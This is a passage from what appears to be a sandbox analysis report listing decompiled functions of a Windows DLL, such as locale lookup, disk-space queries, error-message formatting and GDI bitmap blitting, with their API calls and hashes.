                           				// 0x1000 == FORMAT_MESSAGE_FROM_SYSTEM, 0x400 == MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), 0x100-byte output buffer
                           				if(_t21 == 0 || FormatMessageA(0x1000, 0, _t21, 0x400,  &_v260, 0x100, 0) == 0) {
                           					E00721078(_t22); // no pending error code, or no system text for it
                           				} else {
                           					E007042D8( &_v264, 0x100,  &_v260); // copy the message text into the string _v264 (released by E00704068 in the epilogue)
                           					L0070B904(_v264, 1);
                           					L00703A00();
                           				}
                           				_pop(_t27);
                           				 *[fs:eax] = _t27;
                           				_push(E0072116F);
                           				return E00704068( &_v264);
                           			}

                          APIs
                          • GetLastError.KERNEL32(00000000,00721168), ref: 007210EC
                          • FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,00721168), ref: 00721112
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: ErrorFormatLastMessage
                          • String ID:
                          • API String ID: 3479602957-0
                          • Opcode ID: aad47a93a375f05d537afc5f738fe27685821327ce061d4157360cd359d48472
                          • Instruction ID: 4e8253d2616160a9fb7e23adfb560ec3f024faf034c981c317d52fc22c216866
                          • Opcode Fuzzy Hash: aad47a93a375f05d537afc5f738fe27685821327ce061d4157360cd359d48472
                          • Instruction Fuzzy Hash: 3E01F7B0304359DFD721EB609C92BEA73ECF728700F8140B0B745D62C1EAF86D908920
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 46%
                           			E0070C804(int __eax, void* __ebx, void* __eflags) {
                           				char _v11;
                           				char _v16;
                           				intOrPtr _t28;
                           				void* _t31;
                           				void* _t33;
                           
                           				_t33 = __eflags;
                           				_v16 = 0;
                           				_push(_t31);
                           				_push(0x70c868);
                           				_push( *[fs:edx]);
                           				 *[fs:edx] = _t31 + 0xfffffff4; // SEH frame (the decompiler writes fs:edx here and fs:eax below; both name the fs:[0] slot)
                           				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7); // __eax is the LCID; 0x1004 == LOCALE_IDEFAULTANSICODEPAGE, returned as a decimal string in the 7-byte buffer
                           				E007042D8( &_v16, 7,  &_v11); // copy the buffer into the string _v16
                           				_push(_v16);
                           				E007083E8(7, GetACP(), _t33); // GetACP() supplies the system ANSI code page alongside the locale's string
                           				_pop(_t28);
                           				 *[fs:eax] = _t28;
                           				_push(E0070C86F);
                           				return E00704068( &_v16);
                           			}

                          APIs
                          • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0070C868), ref: 0070C82A
                          • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0070C868), ref: 0070C843
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          • Opcode ID: 7a10d89a70fb9e6efa25686f05cd5b7160d171c85370c53fadc564e192808c6b
                          • Instruction ID: aa9427080524117dcd9b048daa6bf2997e21e665c0e69613c0fe3b68098e455a
                          • Opcode Fuzzy Hash: 7a10d89a70fb9e6efa25686f05cd5b7160d171c85370c53fadc564e192808c6b
                          • Instruction Fuzzy Hash: 9AF09071E08308FBEB05EBE1CC6699EB3EEEBC5B14F40C675B610A66C1EA7C65108750
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                           			E00708912(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
                           				long _v8;
                           				long _v12;
                           				long _v16;
                           				long _v20;
                           				intOrPtr _v24;
                           				signed int _v28;
                           				CHAR* _t25;
                           				int _t26;
                           				intOrPtr _t31;
                           				intOrPtr _t34;
                           				intOrPtr* _t39;
                           				intOrPtr* _t40;
                           				intOrPtr _t48;
                           				intOrPtr _t50;
                           
                           				_t25 = _a4;
                           				if(_t25 == 0) {
                           					_t25 = 0; // no-op; a NULL root directory means the current drive
                           				}
                           				// out parameters in order: sectors per cluster, bytes per sector, free clusters, total clusters
                           				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
                           				_v28 = _v8 * _v12; // bytes per cluster
                           				_v24 = 0;
                           				_t48 = _v24;
                           				_t31 = E00704E90(_v28, _t48, _v16, 0); // lo/hi argument pairs: appears to be a 64-bit multiply, bytes per cluster * free clusters
                           				_t39 = _a8;
                           				 *_t39 = _t31; // free bytes, low dword
                           				 *((intOrPtr*)(_t39 + 4)) = _t48; // free bytes, high dword
                           				_t50 = _v24;
                           				_t34 = E00704E90(_v28, _t50, _v20, 0); // bytes per cluster * total clusters
                           				_t40 = _a12;
                           				 *_t40 = _t34; // total bytes, low dword
                           				 *((intOrPtr*)(_t40 + 4)) = _t50; // total bytes, high dword
                           				return _t26; // success flag from GetDiskFreeSpaceA
                           			}

                          APIs
                          • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 00708935
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: DiskFreeSpace
                          • String ID:
                          • API String ID: 1705453755-0
                          • Opcode ID: a6447be563f94fa06700d01bc4f40152254d1f92233d94cffa8446011941e948
                          • Instruction ID: 91a169c2a67de10e051b508accbb3d28a5713413625d3a1833c26d5f36b6c5ad
                          • Opcode Fuzzy Hash: a6447be563f94fa06700d01bc4f40152254d1f92233d94cffa8446011941e948
                          • Instruction Fuzzy Hash: 4211BEB5A00209EFDB44DF99C8819AFB7F9FFC8310B54C569A505E7254E6319E018B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 53%
                          			E0072A41C(intOrPtr __eax, intOrPtr* __edx) {
                          				intOrPtr _v8;
                          				intOrPtr _t12;
                          				intOrPtr _t21;
                          				intOrPtr _t22;
                          				intOrPtr _t25;
                          
                          				_v8 = __eax;
                          				_t22 =  *__edx;
                          				_t26 = _t22 - 0x113;
                          				if(_t22 != 0x113) {
                          					_push( *((intOrPtr*)(__edx + 8)));
                          					_push( *((intOrPtr*)(__edx + 4)));
                          					_push(_t22);
                          					_t12 =  *((intOrPtr*)(_v8 + 0x34));
                          					_push(_t12);
                          					L007067F0();
                          					 *((intOrPtr*)(__edx + 0xc)) = _t12;
                          					return _t12;
                          				}
                          				_push(0x72a456);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t25;
                          				E00703470(_v8, _t26);
                          				_pop(_t21);
                          				 *[fs:eax] = _t21;
                          				return 0;
                          			}


                          APIs
                          • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0072A481
                          Similarity
                          • API ID: NtdllProc_Window
                          • String ID:
                          • API String ID: 4255912815-0
                          • Opcode ID: 360dc9c1b48b83360bb9ecac6c274a4009195a4449eb06ecfd31b890eab65316
                          • Instruction ID: 5ced122b60562a8068c237869b7cbf45925807dd12572ac6390acc5c40f634df
                          • Opcode Fuzzy Hash: 360dc9c1b48b83360bb9ecac6c274a4009195a4449eb06ecfd31b890eab65316
                          • Instruction Fuzzy Hash: B2F09076604254FF9B00DF9EE896CA6B7ECEB4972075180B6FD08D7651D279ED008B70
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 94%
                          			E0072165C(intOrPtr __eax, intOrPtr __edx) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				char _v48;
                          				struct _SYSTEM_INFO* _t17;
                          				unsigned int _t20;
                          				unsigned int _t22;
                          				signed int _t31;
                          				intOrPtr _t33;
                          
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				_t17 =  &_v48;
                          				GetSystemInfo(_t17);
                          				_t33 = _v8;
                          				_t31 = _v12 - 1;
                          				if(_t31 >= 0) {
                          					if( *((short*)( &_v48 + 0x20)) == 3) {
                          						do {
                          							_t20 =  *(_t33 + _t31 * 4) >> 0x10;
                          							 *(_t33 + _t31 * 4) = _t20;
                          							_t31 = _t31 - 1;
                          						} while (_t31 >= 0);
                          						return _t20;
                          					} else {
                          						goto L2;
                          					}
                          					do {
                          						L2:
                          						asm("bswap eax");
                          						_t22 =  *(_t33 + _t31 * 4) >> 8;
                          						 *(_t33 + _t31 * 4) = _t22;
                          						_t31 = _t31 - 1;
                          					} while (_t31 >= 0);
                          					return _t22;
                          				}
                          				return _t17;
                          			}


                          APIs
                          • GetSystemInfo.KERNEL32(?), ref: 0072166C
                          Similarity
                          • API ID: InfoSystem
                          • String ID:
                          • API String ID: 31276548-0
                          • Opcode ID: ee41f5a3d9cb6b8ca3ff05be9b8e7385d3ae08243e7db83de66892b642c58b34
                          • Instruction ID: 5a2bbd704c3aad3b3bd67350b5e07b2d189e6f7beb42d0878bb7366a4e5591d9
                          • Opcode Fuzzy Hash: ee41f5a3d9cb6b8ca3ff05be9b8e7385d3ae08243e7db83de66892b642c58b34
                          • Instruction Fuzzy Hash: 8FF09071E01119DFCB10DF98D4888DCBBB4FB66311B99429AD404EB342EF39A695CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0070B148(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
                          				char _v260;
                          				int _t5;
                          				intOrPtr _t10;
                          				void* _t18;
                          
                          				_t18 = __ecx;
                          				_t10 = _a4;
                          				_t5 = GetLocaleInfoA(__eax, __edx,  &_v260, 0x100);
                          				_t19 = _t5;
                          				if(_t5 <= 0) {
                          					return E007040BC(_t10, _t18);
                          				}
                          				return E00704158(_t10, _t5 - 1,  &_v260, _t19);
                          			}


                          APIs
                          • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0070B166
                          Similarity
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          • Opcode ID: b6f1d3273fc3b6786132ddf740d69232e68c3821d2a2d61da1dcad8ee581b7aa
                          • Instruction ID: f30c03d6819a4a05b8fb7daab65cf875c66b49f34ca6d58cb37d2f3d51fcadca
                          • Opcode Fuzzy Hash: b6f1d3273fc3b6786132ddf740d69232e68c3821d2a2d61da1dcad8ee581b7aa
                          • Instruction Fuzzy Hash: BDE0D872B04218E7D714A65C4C96AF6B2DCEB5C310F00437EBE04D73C2EEA49E9446E6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0070C10C() {
                          				char _v128;
                          				intOrPtr _v132;
                          				signed int _v136;
                          				intOrPtr _v140;
                          				intOrPtr _v144;
                          				int _t7;
                          				struct _OSVERSIONINFOA* _t18;
                          
                          				_t18->dwOSVersionInfoSize = 0x94;
                          				_t7 = GetVersionExA(_t18);
                          				if(_t7 != 0) {
                          					 *0x76c0d4 = _v132;
                          					 *0x76c0d8 = _v144;
                          					 *0x76c0dc = _v140;
                          					if( *0x76c0d4 != 1) {
                          						 *0x76c0e0 = _v136;
                          					} else {
                          						 *0x76c0e0 = _v136 & 0x0000ffff;
                          					}
                          					return E007042D8(0x76c0e4, 0x80,  &_v128);
                          				}
                          				return _t7;
                          			}


                          APIs
                          • GetVersionExA.KERNEL32(?,0070D930,00000000,0070D948), ref: 0070C11A
                          Similarity
                          • API ID: Version
                          • String ID:
                          • API String ID: 1889659487-0
                          • Opcode ID: de1cd5e72f9a71c8aff64dec6b7a5651e97cd684dc5acac9cff25cc6354d04e4
                          • Instruction ID: 8bd88154de8bef78810f2a01f52ab34964faefcf89d0f69b59b83d73918fd089
                          • Opcode Fuzzy Hash: de1cd5e72f9a71c8aff64dec6b7a5651e97cd684dc5acac9cff25cc6354d04e4
                          • Instruction Fuzzy Hash: 36F017B4948345DFC302DF28DD4162577E0BB48350F008A29F9EAC7391E77CD8048B5A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E0070B194(int __eax, char __ecx, int __edx) {
                          				char _v16;
                          				char _t5;
                          				char _t6;
                          
                          				_push(__ecx);
                          				_t6 = __ecx;
                          				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
                          					_t5 = _t6;
                          				} else {
                          					_t5 = _v16;
                          				}
                          				return _t5;
                          			}


                          APIs
                          • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0070CB16,00000000,0070CD2F,?,?,00000000,00000000), ref: 0070B1A7
                          Similarity
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          • Opcode ID: bd271c67a8736d88d9c6bc7ad2ed21b3b8530ccc7d2e7f1ac70b319964d8341f
                          • Instruction ID: 552799375b7b3ae1f1d8111522a387fba9db334a6b3d9ea706c29f19ab3b7594
                          • Opcode Fuzzy Hash: bd271c67a8736d88d9c6bc7ad2ed21b3b8530ccc7d2e7f1ac70b319964d8341f
                          • Instruction Fuzzy Hash: 17D05E7630D254AAE214565A2DA5DBB8ADCCAC97A0F104239B648C6282D3048C0693B1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E007284AC(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				intOrPtr* _v24;
                          				intOrPtr* _v28;
                          				intOrPtr _v32;
                          				char _v36;
                          				char _v40;
                          				char _v44;
                          				char _v48;
                          				char _v52;
                          				intOrPtr _t91;
                          				void* _t103;
                          				void* _t116;
                          				void* _t132;
                          				void* _t162;
                          				void* _t164;
                          				void* _t168;
                          				void* _t169;
                          				intOrPtr _t188;
                          				void* _t211;
                          				void* _t218;
                          				intOrPtr _t219;
                          				void* _t222;
                          
                          				_t215 = __esi;
                          				_push(__esi);
                          				_v52 = 0;
                          				_v36 = 0;
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				_push(_t222);
                          				_push(0x7286b1);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t222 + 0xffffffd0;
                          				_v20 = 0;
                          				_t211 = 0;
                          				if(__ecx != 0) {
                          					E007040BC(_v8 + 0x24, __ecx);
                          				}
                          				_t91 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x10)) + 8));
                          				if(_t91 <= 0) {
                          					L26:
                          					_pop(_t188);
                          					 *[fs:eax] = _t188;
                          					_push(0x7286b8);
                          					E00704068( &_v52);
                          					return E00704068( &_v36);
                          				} else {
                          					_t162 = _t91 - 1;
                          					if(_t162 < 0) {
                          						L8:
                          						if(_t211 == 0) {
                          							_v48 = E00704528(_v12);
                          							_v44 = 6;
                          							L0070B9FC(_t162, 0x727ed0, 1, _t211, _t215, 0,  &_v48);
                          							L00703A00();
                          						}
                          						if(_t211 == 1) {
                          							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(L007278AC( *((intOrPtr*)(_v8 + 0x10)), _v20) + 4)))) + 0x20))();
                          						}
                          						if(_t211 - 1 <= 0) {
                          							goto L26;
                          						} else {
                          							_v24 = E00703244(1);
                          							_t164 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x10)) + 8)) - 1;
                          							if(_t164 < 0) {
                          								L21:
                          								if( *((intOrPtr*)(_v8 + 0xc)) == 0) {
                          									_t103 =  *((intOrPtr*)( *_v24 + 0x18))();
                          									 *((intOrPtr*)( *_v24 + 0xc))();
                          									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 + 4)))) + 0x20))();
                          								} else {
                          									 *((intOrPtr*)( *_v24 + 0x90))();
                          									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)))) + 0xc))() >= 0) {
                          										_t116 =  *((intOrPtr*)( *_v24 + 0x18))();
                          										 *((intOrPtr*)( *_v24 + 0xc))();
                          										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t116 + 4)))) + 0x20))();
                          									}
                          								}
                          								E00703274(_v24);
                          								goto L26;
                          							}
                          							_t168 = _t164 + 1;
                          							_t218 = 0;
                          							do {
                          								_v32 = L007278AC( *((intOrPtr*)(_v8 + 0x10)), _t218);
                          								if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v32 + 4)))) + 0x10))() <= 0) {
                          									goto L20;
                          								}
                          								_v28 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v32 + 4)))) + 0x14))();
                          								_t132 =  *((intOrPtr*)( *_v28 + 0x14))() - 1;
                          								if(_t132 < 0) {
                          									L19:
                          									E00703274(_v28);
                          									goto L20;
                          								}
                          								_v40 = _t132 + 1;
                          								_v16 = 0;
                          								do {
                          									 *((intOrPtr*)( *_v28 + 0xc))();
                          									 *((intOrPtr*)( *_v24 + 0x3c))();
                          									_v16 = _v16 + 1;
                          									_t56 =  &_v40;
                          									 *_t56 = _v40 - 1;
                          								} while ( *_t56 != 0);
                          								goto L19;
                          								L20:
                          								_t218 = _t218 + 1;
                          								_t168 = _t168 - 1;
                          							} while (_t168 != 0);
                          							goto L21;
                          						}
                          					}
                          					_t169 = _t162 + 1;
                          					_t219 = 0;
                          					do {
                          						if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(L007278AC( *((intOrPtr*)(_v8 + 0x10)), _t219) + 4)))) + 0x10))() > 0) {
                          							_v20 = _t219;
                          							_t211 = _t211 + 1;
                          						}
                          						_t219 = _t219 + 1;
                          						_t169 = _t169 - 1;
                          					} while (_t169 != 0);
                          					goto L8;
                          				}
                          			}


                          Similarity
                          • API ID:
                          • String ID: |Qq
                          • API String ID: 0-638084505
                          • Opcode ID: 36c4fc6b8065c717fd27b534cceaa6b352365f50eb41d65bfa7be9bde660db84
                          • Instruction ID: bebf48768cb6cf53d598b2de78eb2883df36f6b1f0d0ebe098453d5dfb55a81f
                          • Opcode Fuzzy Hash: 36c4fc6b8065c717fd27b534cceaa6b352365f50eb41d65bfa7be9bde660db84
                          • Instruction Fuzzy Hash: C0710574A00219DFCB04DFA9D58899EB7F1FF48310B2582A5E905EB362DB35ED06CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00721174(void* __eax) {
                          				void* __ebx;
                          				void* _t4;
                          
                          				_t4 = __eax;
                          				if(__eax == 0) {
                          					E007210CC(__eax);
                          				}
                          				return _t4;
                          			}


                          Similarity
                          • API ID: ErrorFormatLastMessage
                          • String ID:
                          • API String ID: 3479602957-0
                          • Opcode ID: 39b41b70695c454327eb0993d5023a58a29fd598f34c2b017cd8f3f65892f761
                          • Instruction ID: 717ee782a6f35b2b2cdc5171fe76a50187648247f97ee86828879e13d2a76058
                          • Opcode Fuzzy Hash: 39b41b70695c454327eb0993d5023a58a29fd598f34c2b017cd8f3f65892f761
                          • Instruction Fuzzy Hash: C2A022E030232F833B2038EE3CC000280CCBB382083C00238F300C3202EE8ACC280022
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 52%
                          			E00721318(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
                          				int _v8;
                          				int _v12;
                          				char _v13;
                          				struct HDC__* _v20;
                          				void* _v24;
                          				void* _v28;
                          				long _v32;
                          				long _v36;
                          				intOrPtr _v40;
                          				intOrPtr* _t78;
                          				intOrPtr _t87;
                          				struct HDC__* _t88;
                          				intOrPtr _t91;
                          				struct HDC__* _t92;
                          				struct HDC__* _t135;
                          				int _t162;
                          				intOrPtr _t169;
                          				intOrPtr _t171;
                          				struct HDC__* _t173;
                          				int _t175;
                          				void* _t177;
                          				void* _t178;
                          				intOrPtr _t179;
                          
                          				_t177 = _t178;
                          				_t179 = _t178 + 0xffffffdc;
                          				_v12 = __ecx;
                          				_v8 = __edx;
                          				_t173 = __eax;
                          				_t175 = _a16;
                          				_t162 = _a20;
                          				_v13 = 1;
                          				_t78 =  *0x76e30c; // 0x76c0d4
                          				if( *_t78 != 2 || _t162 != _a40 || _t175 != _a36) {
                          					_v40 = 0;
                          					_push(0);
                          					L00706590();
                          					_v20 = E00721174(0);
                          					_push(_t177);
                          					_push(0x721598);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t179;
                          					_push(_t175);
                          					_push(_t162);
                          					_push(_a32);
                          					L00706588();
                          					_v24 = E00721174(_a32);
                          					_v28 = SelectObject(_v20, _v24);
                          					_push(0);
                          					_t87 =  *0x76f894; // 0x5e0805c0
                          					_push(_t87);
                          					_t88 = _a32;
                          					_push(_t88);
                          					L007066F0();
                          					_v40 = _t88;
                          					_push(0);
                          					_push(_v40);
                          					_push(_a32);
                          					L007066F0();
                          					if(_v40 == 0) {
                          						_push(0xffffffff);
                          						_t91 =  *0x76f894; // 0x5e0805c0
                          						_push(_t91);
                          						_t92 = _v20;
                          						_push(_t92);
                          						L007066F0();
                          						_v40 = _t92;
                          					} else {
                          						_push(0xffffffff);
                          						_push(_v40);
                          						_t135 = _v20;
                          						_push(_t135);
                          						L007066F0();
                          						_v40 = _t135;
                          					}
                          					_push(_v20);
                          					L007066C8();
                          					StretchBlt(_v20, 0, 0, _t162, _t175, _a12, _a8, _a4, _t162, _t175, 0xcc0020);
                          					StretchBlt(_v20, 0, 0, _t162, _t175, _a32, _a28, _a24, _t162, _t175, 0x440328);
                          					_v32 = SetTextColor(_t173, 0);
                          					_v36 = SetBkColor(_t173, 0xffffff);
                          					StretchBlt(_t173, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t162, _t175, 0x8800c6);
                          					StretchBlt(_t173, _v8, _v12, _a40, _a36, _v20, 0, 0, _t162, _t175, 0x660046);
                          					SetTextColor(_t173, _v32);
                          					SetBkColor(_t173, _v36);
                          					if(_v28 != 0) {
                          						SelectObject(_v20, _v28);
                          					}
                          					DeleteObject(_v24);
                          					_pop(_t169);
                          					 *[fs:eax] = _t169;
                          					_push(E0072159F);
                          					if(_v40 != 0) {
                          						_push(0);
                          						_push(_v40);
                          						_push(_v20);
                          						L007066F0();
                          					}
                          					return DeleteDC(_v20);
                          				} else {
                          					_push(1);
                          					_push(1);
                          					_push(_a32);
                          					L00706588();
                          					_v24 = E00721174(_a32);
                          					_v24 = SelectObject(_a12, _v24);
                          					_push(_t177);
                          					_push(0x7213eb);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t179;
                          					MaskBlt(_t173, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00706CCC(0xaa0029, 0xcc0020));
                          					_pop(_t171);
                          					 *[fs:eax] = _t171;
                          					_push(E0072159F);
                          					_v24 = SelectObject(_a12, _v24);
                          					return DeleteObject(_v24);
                          				}
                          			}

                          APIs
                          • 7378A520.GDI32(?,00000001,00000001), ref: 0072135B
                          • SelectObject.GDI32(?,?), ref: 00721370
                          • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,007213EB,?,?), ref: 007213BF
                          • SelectObject.GDI32(?,?), ref: 007213D9
                          • DeleteObject.GDI32(?), ref: 007213E5
                          • 7378A590.GDI32(00000000), ref: 007213F9
                          • 7378A520.GDI32(?,?,?,00000000,00721598,?,00000000), ref: 0072141A
                          • SelectObject.GDI32(?,?), ref: 0072142F
                          • 7378B410.GDI32(?,5E0805C0,00000000,?,?,?,?,?,00000000,00721598,?,00000000), ref: 00721443
                          • 7378B410.GDI32(?,?,00000000,?,5E0805C0,00000000,?,?,?,?,?,00000000,00721598,?,00000000), ref: 00721455
                          • 7378B410.GDI32(?,00000000,000000FF,?,?,00000000,?,5E0805C0,00000000,?,?,?,?,?,00000000,00721598), ref: 0072146A
                          • 7378B410.GDI32(?,5E0805C0,000000FF,?,?,00000000,?,5E0805C0,00000000,?,?,?,?,?,00000000,00721598), ref: 00721480
                          • 7378B150.GDI32(?,?,5E0805C0,000000FF,?,?,00000000,?,5E0805C0,00000000,?,?,?,?,?,00000000), ref: 0072148C
                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 007214AE
                          • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 007214D0
                          • SetTextColor.GDI32(?,00000000), ref: 007214D8
                          • SetBkColor.GDI32(?,00FFFFFF), ref: 007214E6
                          • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 00721512
                          • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00721537
                          • SetTextColor.GDI32(?,?), ref: 00721541
                          • SetBkColor.GDI32(?,?), ref: 0072154B
                          • SelectObject.GDI32(?,00000000), ref: 0072155E
                          • DeleteObject.GDI32(?), ref: 00721567
                          • 7378B410.GDI32(?,00000000,00000000,0072159F,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 00721589
                          • DeleteDC.GDI32(?), ref: 00721592
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: 7378$Object$B410$ColorSelectStretch$Delete$A520Text$A590B150Mask
                          • String ID:
                          • API String ID: 2689844912-0
                          • Opcode ID: 3bcf9c6bb25efa16fe9f2db5d48c7f1f83c9064478d43867dbc0f454e902a4d2
                          • Instruction ID: 91acccd2561b2d6da5bebbfcc9f3691311159725bbfcbb9750009b7c41880bb9
                          • Opcode Fuzzy Hash: 3bcf9c6bb25efa16fe9f2db5d48c7f1f83c9064478d43867dbc0f454e902a4d2
                          • Instruction Fuzzy Hash: 1481BEB1A00219EFDB50EFA8CC95EAF77ECAB0D714F500654F618E7281C679ED108B61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 51%
                          			E0072481C(void* __eax, long __ecx, intOrPtr __edx) {
                          				void* _v8;
                          				intOrPtr _v12;
                          				struct HDC__* _v16;
                          				struct HDC__* _v20;
                          				char _v21;
                          				void* _v28;
                          				void* _v32;
                          				intOrPtr _v92;
                          				intOrPtr _v96;
                          				int _v108;
                          				int _v112;
                          				void _v116;
                          				void* _t64;
                          				int _t65;
                          				intOrPtr _t66;
                          				long _t77;
                          				void* _t107;
                          				intOrPtr _t116;
                          				intOrPtr _t117;
                          				long _t120;
                          				intOrPtr _t123;
                          				void* _t127;
                          				void* _t129;
                          				intOrPtr _t130;
                          
                          				_t127 = _t129;
                          				_t130 = _t129 + 0xffffff90;
                          				_t120 = __ecx;
                          				_t123 = __edx;
                          				_t107 = __eax;
                          				_v8 = 0;
                          				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
                          					return _v8;
                          				} else {
                          					L00723D10(_t107);
                          					_v12 = 0;
                          					_v20 = 0;
                          					_push(_t127);
                          					_push(0x724a17);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t130;
                          					_push(0);
                          					L007068E8();
                          					_v12 = E00721174(0);
                          					_push(_v12);
                          					L00706590();
                          					_v20 = E00721174(_v12);
                          					_push(0);
                          					_push(1);
                          					_push(1);
                          					_push(_v108);
                          					_t64 = _v112;
                          					_push(_t64);
                          					L00706578();
                          					_v8 = _t64;
                          					if(_v8 == 0) {
                          						L17:
                          						_t65 = 0;
                          						_pop(_t116);
                          						 *[fs:eax] = _t116;
                          						_push(0x724a1e);
                          						if(_v20 != 0) {
                          							_t65 = DeleteDC(_v20);
                          						}
                          						if(_v12 != 0) {
                          							_t66 = _v12;
                          							_push(_t66);
                          							_push(0);
                          							L00706B28();
                          							return _t66;
                          						}
                          						return _t65;
                          					} else {
                          						_v32 = SelectObject(_v20, _v8);
                          						if(__ecx != 0x1fffffff) {
                          							_push(_v12);
                          							L00706590();
                          							_v16 = E00721174(_v12);
                          							_push(_t127);
                          							_push(0x7249cf);
                          							_push( *[fs:eax]);
                          							 *[fs:eax] = _t130;
                          							if(_v96 == 0) {
                          								_v21 = 0;
                          							} else {
                          								_v21 = 1;
                          								_v92 = 0;
                          								_t107 = E00724154(_t107, _t123, _t123, 0,  &_v116);
                          							}
                          							_v28 = SelectObject(_v16, _t107);
                          							if(_t123 != 0) {
                          								_push(0);
